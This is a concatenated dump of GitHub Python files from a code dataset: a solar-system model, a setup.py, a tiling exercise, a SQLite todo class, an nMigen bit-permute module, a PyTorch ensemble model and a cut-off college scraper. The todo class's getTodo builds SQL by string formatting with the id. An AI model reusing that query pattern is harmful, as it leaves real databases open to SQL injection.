OrbitalRadius.URANUS\n        self.name = BodyName.URANUS\n\n\nclass Neptune(Planet):\n\n    def __init__(self, sun=None):\n        Planet.__init__(self, star=sun)\n\n        self.type = CelestialBodyType.NEPTUNE\n        self.color = Color.NEPTUNE\n        self.orbit_time = OrbitTime.NEPTUNE\n        self.radius = Radius.NEPTUNE\n        self.orbital_radius = OrbitalRadius.NEPTUNE\n        self.name = BodyName.NEPTUNE\n\n\nclass Sun(Star):\n\n    def __init__(self):\n        Star.__init__(self)\n\n        self.type = CelestialBodyType.SUN\n        self.color = Color.SUN\n        self.radius = Radius.SUN\n        self.name = BodyName.SUN\n\n        self.planets = [\n            Mercury(self),\n            Venus(self),\n            Earth(self),\n            Mars(self),\n            Jupiter(self),\n            Saturn(self),\n            Uranus(self),\n            Neptune(self)\n        ]\n","repo_name":"sugarlabs/solar-system","sub_path":"celestial_bodies.py","file_name":"celestial_bodies.py","file_ext":"py","file_size_in_byte":8517,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"86"} +{"seq_id":"32186546318","text":"from setuptools import find_packages, setup\n\nwith open('requirements/requirements.in') as f:\n    REQUIREMENTS = [\n        item\n        for item in f.read().splitlines()\n        if item.strip() and not item.startswith('--extra')\n    ]\n\nwith open('VERSION') as f:\n    VERSION = f.readline().strip()\n\nsetup(\n    name='patients.dbmodels',\n    version=VERSION,\n    # url='http://127.0.0.1:8000',\n    # download_url='http://127.0.0.1:8000',\n    author='radovanlapar',\n    author_email='laparradovan@gmail.com',\n    packages=find_packages(),\n    install_requires=REQUIREMENTS,\n    tests_require=REQUIREMENTS,\n    include_package_data=True,\n    classifiers=[\n        'Private :: Do Not Upload',\n        'Environment :: Console',\n        'Operating System :: OS Independent',\n        'Programming Language :: Python :: 3',\n        'Programming Language :: Python :: 3 :: Only',\n    ],\n)\n","repo_name":"rlapar/patients","sub_path":"dbmodels/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"4860619789","text":"'''\nWe can use 2*1 small rectangles, placed horizontally or vertically, to cover a larger rectangle. In how many ways can n 2*1 small rectangles cover a 2*n large rectangle without overlapping?\n'''\n'''\nThis problem is a variant of the Fibonacci sequence. When filling the large rectangle, if the first tile is placed vertically, the count equals the count for number - 1; if the first tile is placed horizontally, the final result clearly equals the count for number - 2.\n'''\n'''\nSummary: the key to recursion is working out how to split a big problem into several smaller ones. The clever part of this problem is to first look at what we do in the first step, and then use that first move to determine the recurrence relation.\n'''\n\nclass Solution:\n    def rectCover(self, number):\n        
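# Editor's worked example of the recurrence from the docstrings above:\n        # f(1)=1, f(2)=2, so f(3) = f(2) + f(1) = 3 and f(4) = f(3) + f(2) = 5,\n        # which is what the __main__ check below prints for rectCover(4).\n        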
# if number == 0:\n        #     return 0\n        # if number == 1:\n        #     return 1\n        # if number == 2:\n        #     return 2\n        # return self.rectCover(number - 1) + self.rectCover(number - 2)\n        # non-recursive\n        if number == 0:\n            return 0\n        if number == 1:\n            return 1\n        if number == 2:\n            return 2\n        table = [0 for i in range(number+1)]\n        table[1] = 1\n        table[2] = 2\n        for i in range(3,number+1):\n            table[i] = table[i-1] + table[i-2]\n        return table[number]\n\n\n\n\nif __name__ == '__main__':\n    s = Solution()\n    print(s.rectCover(4))\n","repo_name":"ShawnWuzh/algorithms","sub_path":"递归-矩形覆盖.py","file_name":"递归-矩形覆盖.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"32750295051","text":"import time\r\nimport math\r\nimport sqlite3\r\n\r\nclass todoDB:\r\n    def __init__(self, db):\r\n        self.__db = db\r\n        self.__cur = db.cursor()\r\n    \r\n    def getTodos(self):\r\n        sql = \"SELECT * FROM todos\"\r\n        try:\r\n            self.__cur.execute(sql)\r\n            res = self.__cur.fetchall()\r\n            if res: return res\r\n        except:\r\n            print(\"Database read error 1\")\r\n        return []\r\n    \r\n    def getTodo(self, id):\r\n        sql = \"SELECT * FROM todos WHERE id = {}\".format(id)\r\n        try:\r\n            self.__cur.execute(sql)\r\n            res = self.__cur.fetchone()\r\n            if res: return res\r\n        except:\r\n            print(\"Database read error 2\")\r\n        return []\r\n    \r\n    def addTodo(self, todo, status):\r\n        try:\r\n            tm = math.floor(time.time())\r\n            created_on = tm\r\n            updated_on = tm\r\n            self.__cur.execute(\"INSERT INTO todos VALUES(NULL, ? , ?, ?, ?)\", (todo, status, created_on, updated_on))\r\n            self.__db.commit()\r\n        except sqlite3.Error as e:\r\n            print(\"Error adding entry to the database: \" + str(e))\r\n            return False\r\n        return True\r\n    \r\n    def updateTodo(self, todo, status, id):\r\n        try:\r\n            updated_on = math.floor(time.time())\r\n            self.__cur.execute(\"UPDATE todos SET todo = ?, status = ?, updated_on = ? WHERE id = ?\", (todo, status, updated_on, id))\r\n            self.__db.commit()\r\n        except sqlite3.Error as e:\r\n            print(\"Error updating entry in the database: \" + str(e))\r\n            return False\r\n        return True","repo_name":"rvladimir001/flask_todos","sub_path":"todoDB.py","file_name":"todoDB.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"69830469405","text":"# coding: utf\n\nPROXIES_API_URL = 'http://localhost:8000/api/proxies/?format=json&' \\\n                  'count=%(count)d&' \\\n                  'country_code=%(country_code)s'\nPROXY_USE_LIMIT = 20\n\nQUEUE_BACKEND = 'memory'\n\nCACHE_ENABLED = False\nCACHE_DATABASE = 'parsers-cache'\n","repo_name":"hell10w/samsung-apps-parser","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"17484254416","text":"from nmigen import Elaboratable, Signal, Module, Repl, Cat, Const, Array\nfrom nmigen.cli import main\n\n\nclass Bpermd(Elaboratable):\n    \"\"\"\n    from POWERISA v3.1 p105, chapter 3\n\n    This class does a Bit Permute on a Doubleword\n\n    permd RA,RS,RB\n\n    do i = 0 to 7\n      index ← (RS)[8*i:8*i+7]\n      If index < 64\n         then perm[i] ← (RB)[index]\n         else perm[i] ← 0\n    RA ←56[0] || perm[0:7]\n\n    Eight permuted bits are produced. For each permuted bit i where i\n    ranges from 0 to 7 and for each byte i of RS, do the following.\n\n    If byte i of RS is less than 64, permuted bit i is set to\n    the bit of RB specified by byte i of RS; otherwise\n    permuted bit i is set to 0.\n\n    
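(Editor's illustration, not part of the ISA text: if byte 0 of RS\n    holds the value 3, permuted bit 0 is copied from bit 3 of RB; if\n    byte 1 of RS holds 200, which is >= 64, permuted bit 1 is forced\n    to 0.)\n\n    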
The permuted bits are placed in the least-significant byte of RA,\n    and the remaining bits are filled with 0s.\n\n    Special Registers Altered:\n    None\n\n    Programming Note:\n\n    The fact that the permuted bit is 0 if the corresponding index value\n    exceeds 63 permits the permuted bits to be selected from a 128-bit\n    quantity, using a single index register. For example, assume that\n    the 128-bit quantity Q, from which the permuted bits are to be\n    selected, is in registers r2 (high-order 64 bits of Q) and r3\n    (low-order 64 bits of Q), that the index values are in register r1,\n    with each byte of r1 containing a value in the range 0:127, and that\n    each byte of register r4 contains the value 64. The following code\n    sequence selects eight permuted bits from Q and places them into\n    the low-order byte of r6.\n\n    bpermd r6,r1,r2 # select from high-order half of Q\n    xor r0,r1,r4 # adjust index values\n    bpermd r5,r0,r3 # select from low-order half of Q\n    or r6,r6,r5 # merge the two selections\n    \"\"\"\n\n    def __init__(self, width):\n        self.width = width\n        self.rs = Signal(width, reset_less=True)\n        self.ra = Signal(width, reset_less=True)\n        self.rb = Signal(width, reset_less=True)\n\n    def elaborate(self, platform):\n        m = Module()\n        perm = Signal(self.width, reset_less=True)\n        rb64 = [Signal(1, reset_less=True, name=f\"rb64_{i}\") for i in range(64)]\n        for i in range(64):\n            m.d.comb += rb64[i].eq(self.rb[63-i])\n        rb64 = Array(rb64)\n        for i in range(8):\n            index = self.rs[8*i:8*i+8]\n            idx = Signal(8, name=f\"idx_{i}\", reset_less=True)\n            m.d.comb += idx.eq(index)\n            with m.If(idx < 64):\n                m.d.comb += perm[i].eq(rb64[idx])\n        m.d.comb += self.ra[0:8].eq(perm)\n        return m\n\n\nif __name__ == \"__main__\":\n    bperm = Bpermd(width=64)\n    main(bperm, ports=[bperm.rs, bperm.ra, bperm.rb])\n","repo_name":"ngi-nix/libresoc-soc","sub_path":"src/soc/fu/logical/bpermd.py","file_name":"bpermd.py","file_ext":"py","file_size_in_byte":2711,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"86"} +{"seq_id":"33265782330","text":"from collections import defaultdict\nfrom typing import Optional, Any, Dict, List, Tuple, Union\n\nimport numpy as np\nimport tensorflow as tf\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom sklearn.naive_bayes import GaussianNB\nfrom torch import Tensor\nfrom torch.nn import ModuleList\n\nfrom continual_learning.models.custom_layers.differentiable_knn_layer import DKNN\nfrom continual_learning.models.feature_extractors.base import FeatureExtractor\n\n\nclass WeakLearner(nn.Module):\n    def __init__(self, input_size: int, output_size: int, tanh_factor: float, device: torch.device):\n        super().__init__()\n        self.input_size = input_size\n        self.output_size = output_size\n        self.linear = torch.nn.Linear(input_size, output_size)\n        raw_weights_init = tf.keras.initializers.VarianceScaling(scale=1.0, mode='fan_in', distribution='truncated_normal')(shape=(128, input_size, output_size)).numpy()\n        single_weak_learner_weights = raw_weights_init[0].transpose(1, 0)\n        self.linear.weight.data = torch.Tensor(single_weak_learner_weights)\n        self.tanh_factor = tanh_factor\n        self.linear.to(device)\n\n    def forward(self, x: torch.Tensor):\n        raw_input = x.view(x.size(0), -1)\n        raw_output = self.linear(raw_input)\n        
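# Editor's note: tanh(z / a) * a soft-clips each logit into (-a, a)\n        # while staying differentiable; here a is tanh_factor.\n        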
return torch.tanh(raw_output / self.tanh_factor) * self.tanh_factor\n\n\nclass VanillaClassifier(nn.Module):\n def __init__(self, input_size: int, output_size: int, device: torch.device):\n super().__init__()\n self.linear = torch.nn.Linear(input_size, output_size)\n raw_weights_init = tf.keras.initializers.VarianceScaling(scale=0.1, mode='fan_in', distribution='truncated_normal')(shape=(input_size, output_size)).numpy()\n self.linear.weight.data = torch.Tensor(raw_weights_init.transpose(1, 0))\n self.linear.to(device)\n\n def forward(self, x: torch.Tensor):\n raw_input = x.view(x.size(0), -1)\n raw_output = self.linear(raw_input)\n return torch.log_softmax(raw_output, dim=1)\n\n\nclass TanhClassifier(nn.Module):\n def __init__(self, input_size: int, output_size: int, tanh_factor: float, device: torch.device):\n super().__init__()\n self.linear = torch.nn.Linear(input_size, output_size)\n raw_weights_init = tf.keras.initializers.VarianceScaling(scale=0.1, mode='fan_in', distribution='truncated_normal')(shape=(input_size, output_size)).numpy()\n self.linear.weight.data = torch.Tensor(raw_weights_init.transpose(1, 0))\n self.tanh_factor = tanh_factor\n self.linear.to(device)\n\n def forward(self, x: torch.Tensor):\n raw_input = x.view(x.size(0), -1)\n raw_output = self.linear(raw_input)\n return torch.tanh(raw_output / self.tanh_factor) * self.tanh_factor\n\n\nclass EnsembleE2EModule(nn.Module):\n def __init__(\n self,\n encoder: FeatureExtractor,\n input_size: int,\n num_classifiers: int,\n k_neighbors: int,\n learning_rate: float,\n weight_decay: float,\n tanh_factor: float,\n hard_voting: bool,\n trainable_keys: bool,\n num_classes: int,\n classes: Optional[List[int]] = None,\n device: torch.device = 'cpu',\n ):\n \"\"\"Adaptation of https://arxiv.org/pdf/2105.13327.pdf for end-to-end continual learning.\n :param keys: memory size x key size\n \"\"\"\n super().__init__()\n self.encoder = encoder\n self.input_size = input_size\n self.num_classes = num_classes\n self.num_classifiers = num_classifiers\n self.k_neighbors = k_neighbors\n self.device = device\n self.keys = self._init_keys(trainable=trainable_keys)\n self.classes = classes\n self.learning_rate = learning_rate\n self.weight_decay = weight_decay\n self.tanh_factor = tanh_factor\n self.hard_voting = hard_voting\n\n assert len(self.keys) == self.num_classifiers\n\n self.knn_num_samples = 128 # TODO unused\n self.knn_use_manual_grad = True\n self.knn_epsilon = 5e-4\n self.knn_inner_iter = 400\n self.dknn = DKNN(\n k=k_neighbors,\n num_samples=self.knn_num_samples,\n num_neighbors=self.num_classifiers,\n use_manual_grad=self.knn_use_manual_grad,\n epsilon=self.knn_epsilon,\n max_iter=self.knn_inner_iter,\n device=self.device,\n )\n\n self.distribution_tracker = GaussianNB()\n\n self.models = ModuleList([WeakLearner(input_size=self.input_size, output_size=self.num_classes, tanh_factor=self.tanh_factor, device=self.device) for _ in range(self.num_classifiers)])\n self.vanilla_classifier = VanillaClassifier(\n input_size=self.input_size, output_size=self.num_classes, device=self.device\n ).to(self.device)\n self.tanh_classifier = TanhClassifier(\n input_size=self.input_size, output_size=self.num_classes, tanh_factor=self.tanh_factor, device=self.device\n ).to(self.device)\n self.keys_optimizer = torch.optim.Adam(\n params=[{'params': self.keys}], lr=0.00005,\n )\n self.models_stats = defaultdict(lambda: defaultdict(int))\n self.seen_classes = set()\n self.train_dataset = None\n self.train_loader = None\n\n def _init_keys(self, trainable: 
bool = False):\n keys = np.random.normal(size=(self.num_classifiers, self.input_size))\n keys = torch.from_numpy(keys).to(self.device)\n keys = keys.type(torch.FloatTensor)\n return nn.Parameter(nn.functional.normalize(keys, p=2, dim=1, eps=1e-12), requires_grad=trainable)\n\n def lookup_memory(self, input: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:\n input = torch.nn.functional.normalize(input, p=2, dim=1, eps=1e-12).to(self.device)\n knn_similarity, cos_similarity, cos_distance = self.dknn(\n query=input, neighbors=self.keys, cosine_distance=True, return_distances=True\n )\n return knn_similarity, cos_similarity, cos_distance\n\n def encode(self, example: Tensor) -> Tensor:\n return self.encoder.get_features(example)\n\n def ensemble_forward(self, x: torch.Tensor, knn_similarity: torch.Tensor, cos_similarity: torch.Tensor) -> torch.Tensor:\n ensemble_outputs_batch = []\n for single_input, single_knn_sim, single_cos_sim in zip(x, knn_similarity, cos_similarity):\n ensemble_outputs = [model.forward(single_input.view(1, -1)) for index, model in enumerate(self.models)]\n ensemble_outputs_stacked = torch.cat(ensemble_outputs, dim=0).unsqueeze(0)\n ensemble_outputs_batch.append(ensemble_outputs_stacked)\n ensemble_outputs_batch = torch.cat(ensemble_outputs_batch, dim=0).to(self.device)\n cosine_similarities = torch.tensor(data=cos_similarity).unsqueeze(dim=2).to(self.device)\n knn_similarities = knn_similarity.unsqueeze(dim=2).to(self.device)\n ensemble_outputs_batch = ensemble_outputs_batch * knn_similarities\n cosine_similarities = cosine_similarities * knn_similarities\n ensemble_outputs = torch.sum(ensemble_outputs_batch * cosine_similarities, dim=1) / torch.sum(cosine_similarities, dim=1)\n return ensemble_outputs\n\n def forward(self, x: Tensor, x_is_encoded: bool = False):\n if not x_is_encoded:\n x = self.encode(x)\n x = x.to(self.device)\n # self.distribution_tracker.partial_fit(x.detach().numpy(), y.detach().numpy(), classes=self.classes)\n\n # self.keys_optimizer.zero_grad()\n\n knn_similarity, cos_similarity, cos_distance = self.lookup_memory(x)\n\n # self.update_model_stats(indexes, y.tolist())\n\n vanilla_output = self.vanilla_classifier.forward(x)\n tanh_output = self.tanh_classifier.forward(x)\n ensemble_outputs = self.ensemble_forward(x, knn_similarity, cos_similarity)\n\n # self.keys_optimizer.step() # TODO\n\n # for new_label in torch.unique(y):\n # self.update_seen_classes(new_label.item())\n\n return ensemble_outputs, tanh_output, vanilla_output, cos_distance, knn_similarity\n\n def predict(self, x: Tensor, return_dict: bool = False) -> Union[Tensor, Dict[str, Tensor]]:\n x = self.encode(x) # TODO is_encoded\n x = x.to(self.device)\n knn_similarity, cos_similarity, cos_distance = self.lookup_memory(x)\n\n with torch.no_grad():\n vanilla_outputs = self.vanilla_classifier.forward(x)\n tanh_outputs = self.tanh_classifier.forward(x)\n ensemble_outputs = self.ensemble_forward(x, knn_similarity, cos_similarity)\n\n y_pred_vanilla = torch.argmax(vanilla_outputs, dim=1)\n y_pred_tanh = torch.argmax(tanh_outputs, dim=1)\n y_pred_ensemble = torch.argmax(ensemble_outputs, dim=1)\n\n if return_dict:\n return {\n 'vanilla': y_pred_vanilla,\n 'tanh': y_pred_tanh,\n 'ensemble': y_pred_ensemble,\n }\n\n return y_pred_ensemble\n\n def is_known_class(self, label: Any) -> bool:\n return label in self.seen_classes\n\n def update_seen_classes(self, label: Any) -> None:\n self.seen_classes.add(label)\n\n def update_model_stats(self, indexes: np.ndarray, labels: Any) -> 
None:\n        for index_group, label in zip(indexes, labels):\n            for index in index_group:\n                self.models_stats[index][label] += 1\n\n\ndef generate_example_from_nb(model, class_to_sample: int, examples_count: int = 1):\n    class_mean = model.theta_[class_to_sample]\n    class_std = np.sqrt(model.var_[class_to_sample])\n    sampled = np.random.normal(loc=class_mean, scale=class_std,\n                               size=(examples_count, len(class_mean))).reshape(examples_count, -1)\n\n    sampled = np.clip(sampled, -1, 1)\n    return sampled\n\n\ndef generate_batch(nb_model, classes_to_sample, shuffle: bool = True) -> torch.tensor:\n    generated_examples = []\n    generated_labels = []\n    for class_index, examples_count in classes_to_sample.items():\n        generated_example = generate_example_from_nb(nb_model, class_index, examples_count)\n        generated_tensor = torch.from_numpy(generated_example)\n        generated_examples.append(generated_tensor)\n        generated_labels.extend([class_index] * examples_count)\n\n    batch = torch.cat(generated_examples, dim=0).float()\n    labels = torch.tensor(generated_labels)\n\n    if shuffle:\n        indexes_shuffled = torch.randperm(len(labels))\n        batch = batch[indexes_shuffled].view(batch.size())\n        labels = labels[indexes_shuffled]\n\n    return batch, labels\n","repo_name":"mateusz-wojcik-97/neural-architecture-for-online-ensemble-cl","sub_path":"continual_learning/models/continual/ensemble/ensemble_e2e_module_avalanche.py","file_name":"ensemble_e2e_module_avalanche.py","file_ext":"py","file_size_in_byte":10661,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"73407634205","text":"# This is a sample Python script.\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\n\nimport regression\nfrom numpy import *\nimport matplotlib.pyplot as plt\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n    xArr, yArr = regression.loadDataSet('ex0.txt')\n    # print(regression.lwlr(xArr[0],xArr,yArr,1.0))\n    # print(regression.lwlr(xArr[0], xArr, yArr, 0.001))\n    # get the estimates for every point in the dataset\n    yHat = regression.lwlrTest(xArr, xArr, yArr, 0.003)\n    xMat = mat(xArr)\n    srdInd = xMat[:, 1].argsort(0)\n    xSort = xMat[srdInd][:, 0, :]\n\n    fig = plt.figure()\n    ax = fig.add_subplot(111)\n    ax.plot(xSort[:, 1], yHat[srdInd])\n    plt.show()\n","repo_name":"chintsan-code/machine-learning-tutorials","sub_path":"regression_lwlr/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"33912079153","text":"employees=[\n    [10,\"christy\",\"dataanalyst\",50000],\n    [11,\"jhon\",\"ba\",30000],\n    [12,\"sab\",\"dataanalyst\",40000],\n    [13,\"tom\",\"developer\",40000],\n    [14,\"jhoni\",\"developer\",30000],\n    [15,\"sabir\",\"dataanalyst\",50000],\n    [16,\"tino\",\"developer\",40000],\n    [17,\"tomis\",\"developer\",47000],\n    [18,\"jhonis\",\"developer\",32000],\n\n]\n#print number of employees in this company\nnumber_of_employees=len(employees)\nprint(\"number of employees\",number_of_employees)\n#print total amount of salary\ntotal=0\nfor emp in employees:\n    total+=emp[3]\nprint(\"total amount\",total)\n#group by designation\nd_cnt,da_cnt,ba_cnt=0,0,0\nfor emp in employees:\n    if emp[2]==\"dataanalyst\":\n        da_cnt+=1\n    elif emp[2]==\"developer\":\n        d_cnt+=1\n    else:\n        ba_cnt+=1\nprint(\"developer =\",d_cnt)\nprint(\"dataanalyst =\",da_cnt)\nprint(\"ba =\",ba_cnt)\n#print highest 
salaried employee\nsalary_list=[]\nfor emp in employees:\n    salary_list.append(emp[3])\nprint(salary_list)\nhig_salary=max(salary_list)\nprint(hig_salary)\nfor emp in employees:\n    if emp[3]==hig_salary:\n        print(emp)\n#print lowest salaried developer\nd_salary_list=[]\nfor emp in employees:\n    if(emp[2]==\"developer\"):\n        d_salary_list.append(emp[3])\nlow_salary=min(d_salary_list)\nfor emp in employees:\n    if (emp[3]==low_salary):\n        print(emp)","repo_name":"sreeragkm77/pythondjangoluminar","sub_path":"pythoncollections/listprograms/employees_nested.py","file_name":"employees_nested.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"7264317769","text":"from random import randint\nimport curses\nfrom enum import Enum\n\nfrom src import ProgramState, Board\n\nfrom src.scoreboard_managment import update_scoreboard\n\nclass GameState(Enum):\n    # game states\n    MOVE = 1  # the player is making a move\n    CONFIRM = 2  # the player confirms or undoes the move\n    END = 3  # game over\n\n\nclass GameResult(Enum):\n    # game results\n    WIN = 1  # win\n    TIE = 2  # tie\n\n\nclass Game(ProgramState):\n    def __init__(self, board_size, starting_player, player1, player2):\n        self.board_size = board_size\n        self.starting_player = starting_player\n        self.players = [player1, player2]\n        self.symbols = [\" \", player1.symbol, player2.symbol]\n        self.undoes = [player1.undoes, player2.undoes]\n\n        self.level = 0\n\n        # If the player who should make the first move is not given, one is chosen at random\n        self.current_player = (self.starting_player if self.starting_player > 0 else randint(0, 1))\n\n        self.tui_color = self.players[self.current_player].color\n\n        self.board = Board(self.board_size)\n\n        self.game_state = GameState.MOVE\n        self.game_result = GameResult.WIN\n\n        self.board_selection = [0, 0]  # selected square on the board\n        self.selection = 0  # selected menu position\n\n    def player(self):\n        # returns the player whose turn it is\n        return self.players[self.current_player]\n\n    def adv_player(self):\n        # switches the player whose turn it is\n        self.current_player = (self.current_player + 1) % 2\n        self.tui_color = self.players[self.current_player].color\n\n    def loop(self, scr):\n        self.draw(scr)\n\n        while True:\n            c = scr.getch()\n            if c == ord(\"q\"):\n                return \"menu\", [], {}\n            elif c in (ord(\" \"), ord(\"\\n\")):\n                if self.game_state == GameState.END:\n                    return \"menu\", [], {}\n\n                elif self.game_state == GameState.CONFIRM:\n                    if self.selection == 0:\n                        self.game_state = GameState.MOVE\n\n                        winner = self.board.win_check()\n                        new_position = self.board.get_random_free()\n\n                        if winner:\n                            self.game_result = GameResult.WIN\n                            self.game_state = GameState.END\n                            self.tui_color = self.players[winner - 1].color\n\n                            update_scoreboard(self.player().name, 'win_pvp')\n                        elif not new_position:\n                            self.game_result = GameResult.TIE\n                            self.game_state = GameState.END\n                            self.tui_color = 1\n                        else:\n                            self.board_selection = new_position\n                            self.adv_player()\n\n                    elif self.selection == 1:\n                        if self.undoes[self.current_player] != 0:\n                            self.board.remove(self.board_selection[0], self.board_selection[1])\n                            self.undoes[self.current_player] = self.undoes[self.current_player] - 1\n                            self.game_state = GameState.MOVE\n                    \n                elif self.game_state == GameState.MOVE:\n                    if self.board.place(self.board_selection[0], self.board_selection[1], self.current_player + 1):\n                        self.game_state = GameState.CONFIRM\n\n                self.draw(scr)\n            elif c in (curses.KEY_DOWN, ord(\"s\"), ord(\"j\")):\n                if 
self.game_state == GameState.MOVE:\n self.board_selection[1] = (self.board_selection[1] + 1) % self.board_size\n self.draw(scr)\n elif c in (curses.KEY_UP, ord(\"w\"), ord(\"k\")):\n if self.game_state == GameState.MOVE:\n self.board_selection[1] = (self.board_selection[1] - 1) % self.board_size\n self.draw(scr)\n elif c in (curses.KEY_LEFT, ord(\"a\"), ord(\"h\")):\n if self.game_state == GameState.MOVE:\n self.board_selection[0] = (self.board_selection[0] - 1) % self.board_size\n elif self.game_state == GameState.CONFIRM:\n self.selection = (self.selection - 1) % 2\n self.draw(scr)\n elif c in (curses.KEY_RIGHT, ord(\"d\"), ord(\"l\")):\n if self.game_state == GameState.MOVE:\n self.board_selection[0] = (self.board_selection[0] + 1) % self.board_size\n elif self.game_state == GameState.CONFIRM:\n self.selection = (self.selection + 1) % 2\n self.draw(scr)\n\n def draw(self, scr):\n scr.clear()\n\n self.draw_header(scr, \"Standard Game\", 2, 1)\n self.draw_player_names(scr, 21, 1)\n self.draw_confirm_buttons(scr, 2, 6)\n self.draw_end_message(scr, 2, 6)\n self.draw_board(scr, 2, 9)\n\n self.tui_template(scr)\n\n scr.refresh()\n\n def draw_confirm_buttons(self, scr, x, y):\n if self.game_state == GameState.CONFIRM:\n scr.addstr(y, x, \" confirm \", curses.color_pair(self.tui_color) | curses.A_BLINK if self.selection == 0 else curses.color_pair(1))\n if self.undoes[self.current_player] == 0:\n scr.addstr(y, x+13, \" undo \", curses.color_pair(self.tui_color) | curses.A_BLINK if self.selection == 1 else curses.color_pair(1))\n scr.addstr(\" - you can't undo\")\n else:\n scr.addstr(y, x+13, \" undo \", curses.color_pair(self.tui_color) | curses.A_BLINK if self.selection == 1 else curses.color_pair(1))\n scr.addstr(f\" - you have {self.undoes[self.current_player]} undoes\")\n\n def draw_end_message(self, scr, x, y):\n if self.game_state == GameState.END:\n message = (\" TIE \" if self.game_result == GameResult.TIE else f\" {self.player().get_name()} WON \")\n\n scr.addstr(y, x, message, curses.color_pair(self.tui_color))\n scr.addstr(y, x + 2 + len(message), \" exit \", curses.color_pair(self.tui_color) | curses.A_BLINK)\n\n def draw_header(self, scr, header, x, y):\n scr.addstr(y, x, \" \"*(len(header)+4), curses.color_pair(self.tui_color))\n scr.addstr(y+1, x, f\" {header} \", curses.color_pair(self.tui_color))\n scr.addstr(y+2, x, \" \"*(len(header)+4), curses.color_pair(self.tui_color))\n\n def draw_player_names(self, scr, x, y):\n scr.addstr(y, x, self.players[0].get_name(), curses.color_pair(0 if self.current_player else self.tui_color))\n scr.addstr(y+2, x, self.players[1].get_name(), curses.color_pair(0 if not self.current_player else self.tui_color))\n\n def draw_board(self, scr, x_pos, y_pos):\n for y in range(self.board_size):\n for x in range(self.board_size):\n color = curses.color_pair(1)\n if (y == self.board_selection[1] and x == self.board_selection[0] and self.game_state == GameState.MOVE):\n color = curses.color_pair(self.tui_color) | curses.A_BLINK\n elif (y == self.board_selection[1] and x == self.board_selection[0] and self.game_state == GameState.CONFIRM):\n color = curses.color_pair(self.tui_color)\n\n scr.addstr(y_pos + y * 4, x_pos + x * 9, \" \", color)\n scr.addstr(y_pos + y * 4 + 1, x_pos + x * 9, f\" {self.symbols[self.board(x,y)]} \", color,)\n scr.addstr(y_pos + y * 4 + 2, x_pos + x * 9, \" \", 
color)\n","repo_name":"mpiek-agh/tictactoe_npg","sub_path":"src/program_states/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":7596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"74809949723","text":"import requests\r\nimport csv\r\nfrom selenium import webdriver\r\nimport time\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom bs4 import BeautifulSoup\r\n\r\nURL = \"https://nces.ed.gov/collegenavigator/\"\r\npage = requests.get(URL)\r\n\r\noptions = Options()\r\noptions.add_argument(\"--window-size=1920,1200\")\r\n\r\ndriver_path = \"\\\\Users\\\\patri\\\\Downloads\\\\chromedriver_win32 (1)\\\\chromedriver\"\r\ndriver = webdriver.Chrome(options=options, executable_path=driver_path)\r\n\r\nsoup = BeautifulSoup(page.content, \"html.parser\")\r\nresults = soup.find(id=\"default\")\r\n\r\ncolleges_list = [\"Stanford\", \"Harvard\", \"University of Texas at Austin\", \"Rice University\",\r\n \"Howard University\", \"Texas State University\", \"Rensselaer Polytechnic Institute\",\r\n \"University of California-Berkeley\", \"University of California-Los Angeles\",\r\n \"Dartmouth College\", \"Cornell University\", \"Columbia University in the City of New York\",\r\n \"Neumont\", \"Purdue University-Main Campus\", \"Massachusetts Institute of Technology\",\r\n \"Duke University\", \"University of Pennsylvania\", \"University of Southern California\",\r\n \"Vanderbilt University\", \"Worcester Polytechnic Institute\", \"University of California-Irvine\",\r\n \"Northwestern University\", \"California Polytechnic State University\", \"University of California-Santa Cruz\",\r\n \"University of California-Davis\", \"University of Massachusetts Amherst\", \"Harvey Mudd College\",\r\n \"University of Rochester\", \"University of Pittsburgh-Pittsburgh Campus\", \"University of Hawaii at Manoa\",\r\n \"Hawaii Pacific University\", \"California State University Northridge\", \"California State University Long Beach\",\r\n \"University of North Texas\", \"University of Texas at San Antonio\", \"Brown University\", \r\n \"University of Colorado Boulder\", \"Colorado School of Mines\", \"University of Washington-Seattle\",\r\n \"Washington University in St. 
